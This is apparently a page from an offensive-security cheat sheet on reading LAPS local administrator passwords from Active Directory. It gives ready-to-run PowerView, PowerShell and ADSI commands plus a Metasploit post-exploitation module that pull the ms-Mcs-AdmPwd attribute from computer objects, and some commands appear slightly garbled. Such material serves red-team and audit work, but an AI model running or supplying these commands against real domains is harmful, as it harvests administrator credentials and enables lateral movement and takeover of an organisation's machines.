search

Laps Password Read

Reading laps password with various methods

Permission ==> Read Laps Password

hashtag
Powerview

Get-NetComputer | Select-Object 'name','ms-mcs-admpwd' Get-DomainComputer -identity -properties ms-Mcs-AdmPwd

hashtag
PowerShell

Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd' | Where-Object { $_.'ms-Mcs-AdmPwd' -ne $null } | Select-Object 'Name','ms-Mcs-AdmPwd'

hashtag
Native

([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=)(sAMAccountName=))").findAll() | ForEach-Object { Write-Host "" ; $.properties.cn ; $.properties.'ms-mcs-admpwd'}

hashtag
Metasploit

use post/windows/gather/credentials/enum_laps

hashtag
LAPSToolkit

PreviousBasic ReconNextWeaponizing Windows

Last updated